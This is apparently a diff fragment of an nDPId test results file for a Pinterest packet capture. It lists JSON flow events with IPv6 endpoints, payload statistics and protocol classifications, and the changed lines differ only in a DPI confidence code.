00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
-00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 